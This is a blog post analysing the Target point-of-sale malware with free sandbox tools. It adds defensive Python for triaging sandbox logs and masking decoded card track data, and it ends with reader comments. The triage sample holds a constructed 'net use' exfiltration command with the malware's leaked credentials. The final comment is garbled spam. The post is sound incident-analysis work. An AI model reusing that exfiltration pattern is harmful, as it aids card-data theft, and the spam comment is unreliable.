
Wednesday, January 29, 2014

Target POS Malware vs. Open Source Tools

The popularity of my last blog post on "how" POS malware functions was honestly a bit of a surprise to me, so I am following it up with another blog post covering the "advanced Target malware" (as I have heard many other "experts" call it) and seeing what information I can pull out of the sample using open source tools. A large portion of my post and research was inspired after reading a very good write-up from Mark Yason, which you should definitely read if you have not already done so. After reading his post, I wondered how the findings of Mark, and others, compared to the results of freely available tools. In other words, if you do not have much malware reverse engineering experience, exactly how much information can you discover if you have a little bit of time and access to free tools?

The first thing that I did was manage to acquire the malware sample itself (md5sum: ce0296e2d77ec3bb112e270fc260f274), which took quite a bit of digging. Once I finally did find it, I uploaded the sample to VirusShare, where you can download it for yourself if you have an account (and if you do not have an account, you should definitely request one). Once that was done, I took a look at the file using PeStudio (download) from Marc Ochsenmeier to see what information I could pull out of the malware.

Using PeStudio, I was able to determine that there were several indicators that the file was malicious, the compile time of "Thu Nov 28 18:08:01 2013", some strings of interest, and even the possible original project path of the malware.

PeStudio initial findings
Possible compile time
A couple of strings of interest, including possible project path

From these strings, I had the information that I needed to move on to the next phase, which meant setting up a fake POS environment. For my "fake POS environment" I used a stand-alone Windows XP desktop that I picked up at a second-hand store over Christmas vacation (acquired specifically to be my "Malware Box of Evil"), on which I installed Brian Baskin's Noriben malware sandbox analyzer. Brian's tool is free (you can donate money to him for adult beverages if you wish).

Brian Baskin's Noriben (background)(download)
 - Requires ActiveState Python (download) and Sysinternals Process Monitor (download)

I created some fake Track1 and Track2 data in a text file. Since the Target malware was specifically targeting the executable "pos.exe", I copied notepad.exe from the C:\Windows folder to the desktop, renamed it "pos.exe", and opened my text file of fake card data by dragging it onto the "pos.exe" executable. Although the executable functioned exactly the same as notepad, this method made it appear that "pos.exe" was running and contained Track1 and Track2 data in memory. Once that was done, it was time to use Noriben to see what data I could extract from the system. Having already installed ActiveState Python, it was simply a matter of running Noriben and waiting to see what the Noriben/Process Monitor combination would reveal. I entered the command to kick off Noriben and, once the program told me it was ready, I double-clicked on the malware, which I named "kaptoxa.exe". Surprisingly, the malware did not delete itself, "hide" itself from the Windows GUI interface, or anything; it remained sitting on the desktop. (My first definitive indication that this piece of malware was by no means "advanced".)

After about a minute I saved the fake card data to two files, foo.txt and foo2.txt, in an effort to coax more of the data to be loaded into the fake "pos.exe" process, just in case. Once I was satisfied, I exited Noriben and waited for the results. Not surprisingly, Noriben extracted ALL of the information that I was hoping to see. It confirmed all of the findings that I have seen published on the Target malware to date. Every single piece of it, including the exfiltration commands sending the data to another computer, with the "domain\username password" credentials "ttcopscli3acs\Best1_user BackupU$r" (surely I am not the only one who finds the irony that the most complex string, by far, in the domain-username-password combination is the domain name). I was even able to easily find the "winxml.dll" file in the "C:\Windows\System32" folder where the malware stored the Base64 encoded Track1 and Track2 data!
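
As an added example (not from the post, and not part of Noriben itself), a small triage script that scans a Noriben-style report for the three findings called out above: a net use command carrying inline credentials, a file written into System32 by a non-service process, and a service ImagePath pointing into a user profile. The report lines are constructed and only approximate Noriben's "[Operation] process:pid > details" layout; the process names, PIDs and share path are assumptions.

```python
import re

# Constructed sample in the "[Operation] process:pid > details" shape of a Noriben
# report (an approximation of its layout, not real Noriben output). The indicators
# mirror what the post found: net use with inline credentials, a data file dropped
# into System32 under a .dll name, and a service ImagePath pointing at the sample.
SAMPLE_REPORT = r"""
[CreateProcess] explorer.exe:1372 > "C:\Documents and Settings\user\Desktop\kaptoxa.exe"
[CreateProcess] kaptoxa.exe:2044 > "cmd.exe /c net use S: \\10.0.0.5\share /user:ttcopscli3acs\Best1_user BackupU$r"
[CreateFile] kaptoxa.exe:2044 > C:\WINDOWS\system32\winxml.dll
[RegSetValue] services.exe:704 > HKLM\System\CurrentControlSet\Services\POSWDS\ImagePath = C:\Documents and Settings\user\Desktop\kaptoxa.exe
[RegSetValue] explorer.exe:1372 > HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = 1
"""

LINE_RE = re.compile(r"^\[(\w+)\]\s+(\S+?):(\d+)\s+>\s+(.*)$")

# (rule name, operation it applies to, pattern matched against the detail field)
RULES = [
    ("net use with inline credentials", "CreateProcess",
     re.compile(r"\bnet\s+use\b.*?/user:\S+\s+\S+", re.I)),
    ("service ImagePath set to a user-profile path", "RegSetValue",
     re.compile(r"\\Services\\[^\\]+\\ImagePath\s*=\s*.*(Documents and Settings|Users)\\", re.I)),
]
# Processes normally expected to write under System32; anything else is worth a look.
SYSTEM_WRITERS = {"services.exe", "svchost.exe", "msiexec.exe", "trustedinstaller.exe"}


def triage(report: str) -> list:
    """Return (rule, process, detail) tuples for report lines that match a rule."""
    hits = []
    for raw in report.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # section headers, blank lines, anything that is not an event line
        op, proc, _pid, detail = m.groups()
        for name, rule_op, rx in RULES:
            if op == rule_op and rx.search(detail):
                hits.append((name, proc, detail))
        if (op == "CreateFile" and proc.lower() not in SYSTEM_WRITERS
                and re.search(r"\\system32\\", detail, re.I)):
            hits.append(("file written into System32 by a non-service process", proc, detail))
    return hits


if __name__ == "__main__":
    for rule, proc, detail in triage(SAMPLE_REPORT):
        print(f"{rule}: {proc} -> {detail}")
```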

Noriben created processes (note net use, internal IP addresses, paths, domain-username-passwords, and file naming scheme)
Noriben file activity
Noriben registry activity (note POSWDS\Image Path is the full path to where the malware resides)
Noriben network traffic
winxml.dll in C:\Windows\System32 (file logging Base64 encoded Track data)

Contents of "winxml.dll" file (Base64 encoded Track data)

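
As an added example, not the post's own code: the malware stored Base64 encoded Track data in winxml.dll, and this script decodes such a dump, picks out Track 1 and Track 2 records, checks the Luhn digit and masks the PAN before reporting anything. The record layout (one Base64 line per record) is an assumption, and the card number is a standard Luhn-valid test PAN; the same generator produces the kind of fake Track1/Track2 data the post loads into the fake pos.exe.

```python
import base64
import re

# Track 1 (format B) and Track 2 layouts as encoded on a magstripe: sentinels %/; and ?,
# field separators ^ (Track 1) and = (Track 2), then expiry YYMM and a 3-digit service code.
TRACK1_RE = re.compile(r"%B(\d{13,19})\^([^^]{2,26})\^(\d{4})(\d{3})[^?]*\?")
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{4})(\d{3})[^?]*\?")


def luhn_ok(pan: str) -> bool:
    """True if the PAN passes the Luhn check; separates real track data from noise."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep only the first six and last four digits, as PCI DSS display rules allow."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def parse_track_dump(blob: bytes) -> list:
    """Decode a dump assumed to hold one Base64 record per line; full PANs never leave here."""
    findings = []
    for line in blob.splitlines():
        try:
            rec = base64.b64decode(line.strip(), validate=True).decode("ascii", "replace")
        except ValueError:  # binascii.Error is a ValueError: skip lines that are not Base64
            continue
        for m in TRACK1_RE.finditer(rec):
            findings.append({"track": 1, "pan": mask_pan(m.group(1)),
                             "luhn": luhn_ok(m.group(1)), "exp": m.group(3)})
        for m in TRACK2_RE.finditer(rec):
            findings.append({"track": 2, "pan": mask_pan(m.group(1)),
                             "luhn": luhn_ok(m.group(1)), "exp": m.group(2)})
    return findings


# Constructed sample: a Luhn-valid test PAN (not a real card) in Track 1 and Track 2 form,
# Base64-encoded per line to stand in for the winxml.dll contents the post describes.
FAKE_PAN = "4111111111111111"
FAKE_TRACK1 = f"%B{FAKE_PAN}^DOE/JOHN^25121011000000000000?"
FAKE_TRACK2 = f";{FAKE_PAN}=25121011000000000000?"
SAMPLE_DUMP = b"\n".join(base64.b64encode(t.encode()) for t in (FAKE_TRACK1, FAKE_TRACK2))
```

Run `parse_track_dump(SAMPLE_DUMP)` to see the two masked findings; feeding it a Base64 dump recovered from a real incident yields the same masked output without ever printing a full PAN.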
So there you have it. You can take the Target POS malware and two free tools, which cost a staggering FREE, and gather pretty much all of the information that seasoned malware reverse engineers were able to find while digging through the malware sample. The research that I did on the piece of malware was accomplished in about two hours using these tools, and I am most definitely NOT a malware reverse engineer. I know some RE basics, but anyone could have used these tools and gathered the same results. The freely available tools highlight the hard work put in by tool developers like Brian and Marc, which allows us to automate processes and tasks that would previously have taken us many hours to perform. It also highlights the fact that this piece of malware wasn't particularly advanced by any means; it was simply created with the information needed to target the Target environment specifically (see what I did there?). Cyber criminals will continue to use malware that is only as advanced as it needs to be to allow the compromise, collection, and exfiltration of data. While companies continue to employ weak security practices such as basic username and password combinations, the attackers have to make very few, if any, modifications to existing families of malware.


  1. Brian, Great stuff! Since reading your blog posts, PeStudio has been added to my list of tools. Time to setup my own environment for testing!

    1. Thanks Brad! PeStudio is a great tool, Marc has put a lot of work into it and it is great for on-site triage/information gathering of suspected malware.

  2. Excellent post, my friend! Think I might duplicate your work to see it all for myself first hand. Thanks for providing such excellent detail.

    1. Thanks Ken, by all means go for it! The sample is up on VirusShare, so have at it! Just remember to try to have some fake Track1 & Track2 data present in memory for a process called "pos.exe" :)

  3. For those curious is in the range of multicast addresses. It's used by SSDP. I should probably hard code a reference to that IP into Noriben. Sometime in the future :)

    Great write up, Brian. I'm happy that Noriben was able to give you good results on this.

    1. Thanks Brian, Noriben worked great! You don't have to add it to Noriben (unless you want to ;) of course).

      I should have mentioned that in the post. And of course there are plenty of resources out there to help you figure out what the IP address(es) are!

      Heck, there is even a Brian Baskin IP to country code script floating around ;)

    2. Great work, great post, still trying to learn more about these things

    3. Thanks! I tried to lay it out in an easy to follow methodology and link to all the tools (and listed where you can find the malware sample) so if anyone has some time they can replicate the environment and findings for themselves!

  4. Very Nice!!

    You have posted great information. I am a regular reader of the blog. Right now malware reverse engineering provides a better protection technique from viruses and real-time hackers to protect your personal information. Data security is necessary for everyone.

    Keep up sharing....

  5. Other than the PC running moderate, the machine is assumed control by the noxious programming. These infections mask themselves as hostile to infection application and will begin letting you know that your gadget is contaminated and that you have to tap on the showed catch to acquire an item that will "settle" the issue. types of malwares